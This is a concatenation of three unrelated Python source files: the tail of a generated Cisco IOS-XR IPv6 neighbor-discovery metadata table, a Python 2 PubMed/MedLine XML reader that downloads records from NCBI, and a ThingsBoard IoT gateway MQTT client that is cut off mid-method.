[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('bundle-interfaces', REFERENCE_CLASS, 'BundleInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces',
[], [],
''' IPv6 ND list of bundle interfaces for a
specific node
''',
'bundle_interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('bundle-nodes', REFERENCE_CLASS, 'BundleNodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.BundleNodes',
[], [],
''' IPv6 ND list of bundle nodes for a specific
node
''',
'bundle_nodes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.Interfaces',
[], [],
''' IPv6 node discovery list of interfaces for a
specific node
''',
'interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('nd-virtual-routers', REFERENCE_CLASS, 'NdVirtualRouters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters',
[], [],
''' IPv6 ND virtual router information for a
specific interface
''',
'nd_virtual_routers',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('neighbor-interfaces', REFERENCE_CLASS, 'NeighborInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces',
[], [],
''' IPv6 node discovery list of neighbor
interfaces
''',
'neighbor_interfaces',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('neighbor-summary', REFERENCE_CLASS, 'NeighborSummary' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary',
[], [],
''' IPv6 Neighbor summary
''',
'neighbor_summary',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node',
[], [],
''' IPv6 node discovery operational data for a
particular node
''',
'node',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes',
[], [],
''' IPv6 node discovery list of nodes
''',
'nodes',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'ipv6-node-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
}
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode.Age']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes.BundleNode']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.NdParameters']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.LocalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.GlobalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface.MemberNode']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces.BundleInterface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces.Interface']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.LocalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter.VrGlobalAddress']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters.NdVirtualRouter']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NeighborSummary']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleNodes']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.BundleInterfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.Interfaces']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node.NdVirtualRouters']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes.Node']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery.Nodes']['meta_info']
_meta_table['Ipv6NodeDiscovery.Nodes']['meta_info'].parent =_meta_table['Ipv6NodeDiscovery']['meta_info']
|
|
#!/usr/bin/python
"""
Classes to read and process MedLine XML record files, for use in processing modules.
They can handle the XML format used by PubMed and MedLine services, for example as returned by eutils online services
>>> xml_records = urllib.urlopen('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id='+list_of_pmids+'&retmode=xml').read()
When used, an object is created as a global repository, from which records (also objects) can be queried and extracted. These record-objects have properties like title, authors, abstracts that return their string values.
Somewhat long loading times can be shortened later by serializing objects using cPickle module
USAGE:
>>> from BioReader import *
>>> data = DataContainer('AllAbstracts.xml','pubmed')
>>> data.howmany # len(data.dictRecords.keys())
>>> data.keys # data.dictRecords.keys()
>>> record = data.Read('7024555')
>>> record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MesH Descriptors)}
- B{.MQ} I{(MesH Qualifiers, if any)}
- B{.MDMay} I{(list of Mayor MesH Descriptors, if any)}
- B{.MQMay} I{(list of Mayor MesH Qualifiers, if any)}
- B{.paper} I{(full text flat file if exists in user-defined repository
The Search method inside the DataContainer class is not working well, and should be rewritten using better XML techniques and methods
A class (CreateXML) has been added recently to create the pubmed XML file from a list of PubMed ids. Has not been fully integrated with the data container class
Another class shoud be able to query keywords directly to pubmed, to either get the pubmed ids or the xml directly, using either BioPython's PubMed modules of directly through Eutil's facilities
"""
#__docformat__ = 'epytext en'
# General info
__version__ = '5.0'
__author__ = 'Carlos Rodriguez'
__url__ = 'http://www.cnio.es'
__license__ = 'GNU'
from xml.dom.minidom import parseString
import string
import re
import os
class BioReader:
"""
Class BioReader for BioMedical files
"""
def __init__(self, string, path=None):
"""
Initialize class with XML string and returns record data and body of text objects.
>>> single_record = BioReader(record)
>>> single_record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
>>> single_record.pmid
u'7024555'
single_record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MesH Descriptors)}
- B{.MQ} I{(MesH Qualifiers, if any)}
- B{.MDMay} I{(list of Mayor MesH Descriptors, if any)}
- B{.MQMay} I{(list of Mayor MesH Qualifiers, if any)}
- B{.paper} I{(full text flat file if exists in user-defined repository [see notes below])}
If we use a repository with full text papers (with pmid+<pmidnumber>+txt format),
we can use the following, after specifying it in the Data Container we instantiated:
>>> data.Repository("/repositorio/Regulontxt/")
>>> record = data.dictRecords['9209026']
>>> single_record = BioReader(record,data.repository)# or directly inputing path, if it was not done\\
through the DataContainer class: single_record = BioReader(record,'/path/to/repository/')
>>> single_record.paper
'Aerobic Regulation of the sucABCD Genes of Escherichia coli,Which Encode \xef\xbf\xbd-Ketoglutarate Dehydrogenase andSuccinyl Coenzyme A Synthetase: Roles of ArcA,Fnr, and the Upstream sdhCDAB Promoter\n.....'
"""
self.tags = re.compile("<.*?>")
self.parsed = parseString(string)
self.document = self.parsed.documentElement
self.pmid = self.document.getElementsByTagName("PMID")[0].firstChild.data
self.year = self.document.getElementsByTagName("DateCreated")[0].getElementsByTagName("Year")[0].firstChild.data
self.journal = self.document.getElementsByTagName("MedlineJournalInfo")[0].getElementsByTagName("MedlineTA")[0].firstChild.data
self.testAbs = self.document.getElementsByTagName("Abstract")
if path != None:
self.path = path
self.paper = self.GetFullPaper()
else:
self.path = None
self.paper = None
try:
self.year = self.document.getElementsByTagName("PubDate")[0].getElementsByTagName("Year")[0].firstChild.data
except IndexError:
self.year = self.document.getElementsByTagName("DateCreated")[0].getElementsByTagName("Year")[0].firstChild.data
try:
self.Abs = self.document.getElementsByTagName("Abstract")[0].getElementsByTagName("AbstractText")[0].firstChild.data
except IndexError:
self.Abs = "n/a"
self.title = self.document.getElementsByTagName("ArticleTitle")[0].firstChild.data
try:
self.authorsList = self.document.getElementsByTagName("AuthorList")[0].getElementsByTagName("Author")
self.Lista = [self.authorize(y.childNodes) for y in self.authorsList]
s = ""
for x in self.Lista:
s = s + x + "\n"
self.auth = s
except AttributeError:
self.auth = " "
except IndexError:
self.auth = " "
try:
self.meshes = self.document.getElementsByTagName("MeshHeadingList")[0].getElementsByTagName("MeshHeading")
self.ListaMs = [self.Meshes(z.childNodes) for z in self.meshes]
self.MD = []
self.MQ = []
self.MDMay = []
self.MQMay = []
for z in self.meshes:
MD,MQ,MDMay,MQMay = self.MeshKeys(z)
self.MD = MD + self.MD
self.MQ = MQ + self.MQ
self.MDMay = MDMay + self.MDMay
self.MQMay = MQMay + self.MQMay
self.m = ""
for x in self.ListaMs:
self.m = x+" \n "+self.m
#self.p = None
except IndexError:
self.m = "n/a"
self.meshes = "n/a"
self.MQ = None
self.MD = None
self.MDMay = None
self.MQMay = None
#self.p = None
#from DataContainer import repository
#self.authors = string.join( self.Lista )#[self.authorize(x)+"\n" for x in self.Lista]
def __repr__(self):
return "<BioReader record instance: pmid: "+self.pmid+" title: "+self.title+" abstract: "+self.Abs+">"
def authorize(self, node):
s = ""
for z in node:
f = z.toxml()
f = re.sub(self.tags,"",f)
f = re.sub("\n","",f)
f = re.sub("\t"," ",f)
f = re.sub(" ","",f)
s = s + f+" "
return s
def Meshes(self, node):
s = ""
for z in node:
f = z.toxml()
f = re.sub(self.tags,"",f)
f = re.sub("\n","",f)
f = re.sub("\t"," ",f)
f = re.sub(" ","",f)
s = s + f+" "
return s
def MeshKeys(self,node):
"""
Create sets of MesH Keywords, separating qualifiers and descriptors, as well as //
MajorTopics for each one. returns Lists.
"""
listDescriptors = node.getElementsByTagName("DescriptorName")
listQualifiers = node.getElementsByTagName("QualifierName")
MD = [x.firstChild.data for x in listDescriptors]
MQ = [x.firstChild.data for x in listQualifiers]
MQMay = [q.firstChild.data for q in listQualifiers if (q.getAttribute("MajorTopicYN") == "Y")]
MDMay = [q.firstChild.data for q in listDescriptors if (q.getAttribute("MajorTopicYN") == "Y")]
return MD,MQ,MDMay,MQMay
def GetFullPaper(self):
"""
Gets the full paper from the path of an (optional) repository.
The full papers must have the following format:
pmid+<pmidnumber>+.txt (last extension optional)
"""
pmidList = os.listdir(self.path)
if pmidList[0][-4:] == '.txt':
pmidList = [x[4:-4] for x in pmidList]
formato = 1
else:
pmidList = [x[4:] for x in pmidList]
formato = None
if self.pmid in pmidList:
if formato:
self.paper = open(self.path+"pmid"+self.pmid+".txt").read()
return self.paper
else:
self.paper = open(self.path+"pmid"+self.pmid).read()
return self.paper
else:
self.paper = None
class DataContainer:
"""
Data container for Pubmed and Medline XML files.
The instance creates a dictionary object (dictRecords) of PMIDs,
referenced to string of record, which BioReader class can parse.
The method C{Read} creates a queryable object for each record assoicated with a PMID:
>>> from BioReader import *
>>> data = DataContainer('AllAbs.xml','pubmed')
>>> data.dictRecords.keys()[23]
>>> u'7024555'
>>> data.howmany
>>> 14350
1) Method One
>>> record = data.Read('7024555')
>>> record.title
u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.'
record +
- B{.title}
- B{.pmid}
- B{.Abs} I{(abstracts)}
- B{.year}
- B{.journal}
- B{.auth} I{(list of authors)}
- B{.m} I{(list of MeSH keywords, descriptors and qualifiers)}
- B{.MD} I{(MesH Descriptors)}
- B{.MQ} I{(MesH Qualifiers, if any)}
- B{.MDMay} I{(list of Mayor MesH Descriptors, if any)}
- B{.MQMay} I{(list of Mayor MesH Qualifiers, if any)}
- B{.paper} I{(full text flat file if exists in user-defined repository [see notes below])}
If we use a repository with full text papers
(with pmid+<pmidnumber>+txt format (extension optional),
we can use the following, after specifying it in the DataContainer we instantiated:
>>> data.Repository("/repositorio/Regulontxt/")
>>> record.paper
'Aerobic Regulation of the sucABCD Genes of Escherichia coli, Which Encode \xef\xbf\xbd-Ketoglutarate Dehydrogenase andSuccinyl Coenzyme A Synthetase: Roles of ArcA,Fnr, and the Upstream sdhCDAB Promoter\n.....
2) Method two
>>> record = data.dictRecords['7024555']
>>> single_record = BioReader(record)
>>> single_record.title
>>> u'The birA gene of Escherichia coli encodes a biotin holoenzyme synthetase.' etc ...
(See L{BioReader})
"""
def __init__(self,file,format="medline"):
"""
Initializes class and returns record data and body of text objects
"""
import time
tinicial = time.time()
self.file = file
whole = open(self.file).read()
if format.lower() == "medline":
self.rerecord = re.compile(r'\<MedlineCitation Owner="NLM" Status="MEDLINE"\>'r'(?P<record>.+?)'r'\</MedlineCitation\>',re.DOTALL)
elif format.lower() == "pubmed":
self.rerecord = re.compile(r'\<PubmedArticle\>'r'(?P<record>.+?)'r'\</PubmedArticle\>',re.DOTALL)
else:
print "Unrecognized format"
self.RecordsList = re.findall(self.rerecord,whole)
whole = ""
self.RecordsList = ["<PubmedArticle>"+x.rstrip()+"</PubmedArticle>" for x in self.RecordsList]
self.dictRecords = self.Createdict()
self.RecordsList = []
self.howmany = len(self.dictRecords.keys())
self.keys = self.dictRecords.keys()
tfinal = time.time()
self.repository = None
print "finished loading at ",time.ctime(tfinal)
print "loaded in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
def __repr__(self):
return "<BioReader Data Container Instance: source filename: "+self.file+" \nnumber of files: "+str(self.howmany)+">"
def Repository(self,repository):
"""
Establish path to a full text repository, in case you want to use that variable in the BioReader
"""
self.repository = repository
return self.repository
def Createdict(self):
"""
Creates a dictionary with pmid number indexing record xml string
"""
i = 0
dictRecords = {}
for p in self.RecordsList:
r = BioReader(p)
dictRecords[r.pmid] = self.RecordsList[i]
i += 1
return dictRecords
def Read(self,pmid):
if self.repository:
self.record = BioReader(self.dictRecords[pmid],self.repository)
else:
self.record = BioReader(self.dictRecords[pmid])
return self.record
def Search(self,cadena,where=None):
"""
This method is not working. Needs to be redone to comply with more up-to-date XML search methods
Searches for "cadena" string inside the selected field, and returns a list of pmid where it was found.
If not "where" field is provided, will search in all of the record.
You can search in the following fields:
- title
- year
- journal
- auth or authors
- 'abs' or 'Abs' or 'abstract'
- paper or "full" (if full-text repository has been defined)
- pmid
With defined field search is very slow but much more accurate. See for comparison:
>>> buscados = data.Search("Richard")
Searched in 0.110424995422 seconds, or 0.00184041659037 minutes
Found a total of 75 hits for your query, in all fields
>>> buscados = data.Search("Richard","auth")
Searched in 66.342936039 seconds, or 1.10571560065 minutes
Found a total of 75 hits for your query, in the auth field
"""
tinicial = time.time()
resultlist = []
if where:
for cadapmid in self.dictRecords.keys():
d = self.Read(cadapmid)
if where == 'title':
tosearch = d.title
elif where == 'year':
tosearch = d.year
elif where == 'journal':
tosearch = d.journal
elif where == ('auth' or 'authors'):
tosearch = d.auth
elif where == ('m' or 'mesh'):
tosearch = d.m
elif where == ('abs' or 'Abs' or 'abstract'):
tosearch = d.Abs
elif where == ('paper' or 'full'):
tosearch = d.paper
if self.repository:
pass
else:
print "No full text repository has been defined...."
return None
elif where == 'pmid':
tosearch = d.pmid
hit = re.search(cadena,tosearch)
if hit:
resultlist.append(d.pmid)
else:
pass
if len(resultlist)!= 0:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Found a total of ",str(len(resultlist))," hits for your query, in the ",where," field"
return resultlist
else:
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Query not found"
return None
else:
tosearch = ''
for cadapmid in self.dictRecords.keys():
tosearch = self.dictRecords[cadapmid]
hit = re.search(cadena,tosearch)
if hit:
resultlist.append(cadapmid)
else:
pass
if len(resultlist)!= 0:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Found a total of ",str(len(resultlist))," hits for your query, in all fields"
return resultlist
else:
tfinal = time.time()
print "Searched in", tfinal-tinicial," seconds, or",((tfinal-tinicial)/60)," minutes"
print "Query not found"
return None
class CreateXML:
"""
Class to generate PubMed XMLs from a list of ids (one per line), to use with BioRea.
downloads in 100 batch.
Usage:
outputfile = "NuevosPDFRegulon.xml"
inputfile = "/home/crodrigp/listaNuevos.txt"
>>> XMLCreator = CreateXML()
>>> XMLCreator.GenerateFile(inputfile,outputfile)
>>> parseableString = XMLCreator.Generate2String(inputfile)
or
>>> XMLString = XMLCreator.Generate2String()
"""
def __init__(self):
#global urllib,time,string,random
import urllib,time,string,random
def getXml(self,s):
pedir = urllib.urlopen("http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id="+s+"&retmode=xml")
stringxml = pedir.read()
self.salida.write(stringxml[:-20]+"\n")
def getXmlString(self,s):
pedir = urllib.urlopen("http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id="+s+"&retmode=xml")
stringxml = pedir.read()
return stringxml[:-20]+"\n"
def listastring(self,list):
suso = string.join(list,",")
return suso
def GenerateFile(self,inputfile,outputfile):
self.outputfile = outputfile
self.inputfile = inputfile
self.salida = open(self.outputfile,"w")
self.listaR = open(self.inputfile).readlines()
self.listafin = [x.rstrip() for x in self.listaR]
self.listacorr = []
while self.listafin != []:
if len(self.listafin) < 100:
cientos = self.listafin[:]
#self.listafin = []
else:
cientos = self.listafin[:100]
print "new length self.listacorr", len(self.listafin)
if len(self.listafin) <= 0:
break
else:
#time.sleep(120)
nueva = self.listastring(cientos)
self.getXml(nueva)
for c in cientos:
print c
self.listafin.remove(c)
self.salida.close()
def Generate2String(self,inputfile):
self.inputfile = inputfile
self.listaR = open(self.inputfile).readlines()
self.AllXML = ''
self.listafin = [x.rstrip() for x in self.listaR]
self.listacorr = []
while self.listafin != []:
if len(self.listafin) < 100:
cientos = self.listafin[:]
#self.listafin = []
else:
cientos = self.listafin[:100]
print "new length self.listacorr", len(self.listafin)
if len(self.listafin) <= 0:
break
else:
time.sleep(120)
nueva = self.listastring(cientos)
newX = self.getXmlString(nueva)
self.AllXML = self.AllXML + newX
for c in cientos:
print c
self.listafin.remove(c)
return self.AllXML
|
|
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import time
from simplejson import dumps
from thingsboard_gateway.tb_client.tb_device_mqtt import TBDeviceMqttClient
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
GATEWAY_ATTRIBUTES_TOPIC = "v1/gateway/attributes"
GATEWAY_ATTRIBUTES_REQUEST_TOPIC = "v1/gateway/attributes/request"
GATEWAY_ATTRIBUTES_RESPONSE_TOPIC = "v1/gateway/attributes/response"
GATEWAY_MAIN_TOPIC = "v1/gateway/"
GATEWAY_RPC_TOPIC = "v1/gateway/rpc"
GATEWAY_RPC_RESPONSE_TOPIC = "v1/gateway/rpc/response"
GATEWAY_CLAIMING_TOPIC = "v1/gateway/claim"
log = logging.getLogger("tb_connection")
class TBGatewayMqttClient(TBDeviceMqttClient):
def __init__(self, host, port, token=None, gateway=None, quality_of_service=1):
super().__init__(host, port, token, quality_of_service)
self.quality_of_service = quality_of_service
self.__max_sub_id = 0
self.__sub_dict = {}
self.__connected_devices = set("*")
self.devices_server_side_rpc_request_handler = None
self._client.on_connect = self._on_connect
self._client.on_message = self._on_message
self._client.on_subscribe = self._on_subscribe
self._client._on_unsubscribe = self._on_unsubscribe
self._gw_subscriptions = {}
self.gateway = gateway
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
super()._on_connect(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_ATTRIBUTES_TOPIC, qos=1)[1])] = GATEWAY_ATTRIBUTES_TOPIC
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_ATTRIBUTES_RESPONSE_TOPIC, qos=1)[1])] = GATEWAY_ATTRIBUTES_RESPONSE_TOPIC
self._gw_subscriptions[int(self._client.subscribe(GATEWAY_RPC_TOPIC, qos=1)[1])] = GATEWAY_RPC_TOPIC
# self._gw_subscriptions[int(self._client.subscribe(GATEWAY_RPC_RESPONSE_TOPIC)[1])] = GATEWAY_RPC_RESPONSE_TOPIC
def _on_subscribe(self, client, userdata, mid, reasoncodes, properties=None):
subscription = self._gw_subscriptions.get(mid)
if subscription is not None:
if mid == 128:
log.error("Service subscription to topic %s - failed.", subscription)
del self._gw_subscriptions[mid]
else:
log.debug("Service subscription to topic %s - successfully completed.", subscription)
del self._gw_subscriptions[mid]
def _on_unsubscribe(self, *args):
log.debug(args)
def get_subscriptions_in_progress(self):
return True if self._gw_subscriptions else False
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
super()._on_decoded_message(content, message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(GATEWAY_ATTRIBUTES_RESPONSE_TOPIC):
with self._lock:
req_id = content["id"]
# pop callback and use it
if self._attr_request_dict[req_id]:
self._attr_request_dict.pop(req_id)(content, None)
else:
log.error("Unable to find callback to process attributes response from TB")
elif message.topic == GATEWAY_ATTRIBUTES_TOPIC:
with self._lock:
# callbacks for everything
if self.__sub_dict.get("*|*"):
for device in self.__sub_dict["*|*"]:
self.__sub_dict["*|*"][device](content)
# callbacks for device. in this case callback executes for all attributes in message
if content.get("device") is None:
return
target = content["device"] + "|*"
if self.__sub_dict.get(target):
for device in self.__sub_dict[target]:
self.__sub_dict[target][device](content)
# callback for atr. in this case callback executes for all attributes in message
targets = [content["device"] + "|" + attribute for attribute in content["data"]]
for target in targets:
if self.__sub_dict.get(target):
for device in self.__sub_dict[target]:
self.__sub_dict[target][device](content)
elif message.topic == GATEWAY_RPC_TOPIC:
if self.devices_server_side_rpc_request_handler:
self.devices_server_side_rpc_request_handler(self, content)
def __request_attributes(self, device, keys, callback, type_is_client=False):
if not keys:
log.error("There are no keys to request")
return False
keys_str = ""
for key in keys:
keys_str += key + ","
keys_str = keys_str[:len(keys_str) - 1]
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
msg = {"key": keys_str,
"device": device,
"client": type_is_client,
"id": attr_request_number}
info = self._client.publish(GATEWAY_ATTRIBUTES_REQUEST_TOPIC, dumps(msg), 1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def gw_request_shared_attributes(self, device_name, keys, callback):
return self.__request_attributes(device_name, keys, callback, False)
def gw_request_client_attributes(self, device_name, keys, callback):
return self.__request_attributes(device_name, keys, callback, True)
def gw_send_attributes(self, device, attributes, quality_of_service=1):
return self.publish_data({device: attributes}, GATEWAY_MAIN_TOPIC + "attributes", quality_of_service)
def gw_send_telemetry(self, device, telemetry, quality_of_service=1):
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data({device: telemetry}, GATEWAY_MAIN_TOPIC + "telemetry", quality_of_service, )
def gw_connect_device(self, device_name, device_type):
info = self._client.publish(topic=GATEWAY_MAIN_TOPIC + "connect", payload=dumps({"device": device_name, "type": device_type}),
qos=self.quality_of_service)
self.__connected_devices.add(device_name)
# if self.gateway:
# self.gateway.on_device_connected(device_name, self.__devices_server_side_rpc_request_handler)
log.debug("Connected device %s", device_name)
return info
def gw_disconnect_device(self, device_name):
info = self._client.publish(topic=GATEWAY_MAIN_TOPIC + "disconnect", payload=dumps({"device": device_name}),
qos=self.quality_of_service)
if device_name in self.__connected_devices:
self.__connected_devices.remove(device_name)
# if self.gateway:
# self.gateway.on_device_disconnected(self, device_name)
log.debug("Disconnected device %s", device_name)
return info
def gw_subscribe_to_all_attributes(self, callback):
return self.gw_subscribe_to_attribute("*", "*", callback)
def gw_subscribe_to_all_device_attributes(self, device, callback):
return self.gw_subscribe_to_attribute(device, "*", callback)
def gw_subscribe_to_attribute(self, device, attribute, callback):
if device not in self.__connected_devices:
log.error("Device %s is not connected", device)
return False
with self._lock:
self.__max_sub_id += 1
key = device + "|" + attribute
if key not in self.__sub_dict:
self.__sub_dict.update({key: {device: callback}})
else:
self.__sub_dict[key].update({device: callback})
log.info("Subscribed to %s with id %i for device %s", key, self.__max_sub_id, device)
return self.__max_sub_id
def gw_unsubscribe(self, subscription_id):
with self._lock:
for attribute in self.__sub_dict:
if self.__sub_dict[attribute].get(subscription_id):
del self.__sub_dict[attribute][subscription_id]
log.info("Unsubscribed from %s, subscription id %r", attribute, subscription_id)
if subscription_id == '*':
